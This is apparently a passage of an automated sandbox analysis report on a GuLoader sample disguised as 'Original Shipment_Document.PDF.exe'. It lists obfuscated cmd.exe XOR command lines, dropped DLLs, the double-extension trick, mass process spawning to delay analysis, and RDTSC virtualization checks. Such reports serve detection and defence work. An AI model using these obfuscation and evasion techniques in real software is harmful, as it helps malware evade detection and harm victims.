    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404954
    Source: Original Shipment_Document.PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000000.00000002.520490666.00000000030F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Obfuscated command line found
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03631637^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C382120^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7F303920^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x78713865^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6D7569^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x41616575^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x49796569^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307571^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216D75^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09703C6B^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7578^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0363032C^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B2D2024^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x55183929^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x563A7D2C^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09753C65^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5079653D^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0D697C35^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6478^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630620^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4D1F3C29^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C093A2C^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x572D3037^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x11307537^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0C75752C^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19686375^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09697569^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15307575^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0A64721C^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630720^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x583D132C^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x553C7D2C^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7965^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x50792774^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0975752C^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19697C2C^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6678^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4C2A3037^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03631637^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C382120^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7F303920^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x78713865^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6D7569^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x41616575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03631637^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x49796569^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307571^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216D75^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09703C6B^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0363032C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B2D2024^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x55183929^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x563A7D2C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09753C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09753C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5079653D^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0D697C35^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6478^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630620^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C093A2C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x572D3037^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x11307537^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0C75752C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19686375^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09697569^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15307575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630620^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0A64721C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630720^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x583D132C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x553C7D2C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7965^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x50792774^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0975752C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19697C2C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6678^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4C2A3037^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_6EAC30C0 push eax; ret 0_2_6EAC30EE
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_6EAC1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6EAC1BFF
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeFile created: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\nsExec.dllJump to dropped file
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeFile created: C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dllJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Uses an obfuscated file name to hide its real file extension (double extension)
    Source: Possible double extension: pdf.exeStatic PE information: Original Shipment_Document.PDF.exe
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Mass process execution to delay analysis
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03631637^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C382120^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7F303920^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x78713865^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6D7569^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x41616575^962155845"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeRDTSC instruction interceptor: First address: 00000000030F265F second address: 00000000030F265F instructions: 0x00000000 rdtsc 0x00000002 cmp ch, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FC308EAEAB8h 0x00000008 pushad 0x00000009 mov al, A5h 0x0000000b cmp al, A5h 0x0000000d jne 00007FC308EC080Dh 0x00000013 popad 0x00000014 inc ebp 0x00000015 test ah, ch 0x00000017 inc ebx 0x00000018 test ecx, ecx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-4841
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-4837
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_6EAC1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6EAC1BFF
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03631637^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C382120^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7F303920^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x78713865^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6D7569^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x41616575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03631637^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x49796569^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307571^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216D75^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09703C6B^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"Jump to behavior
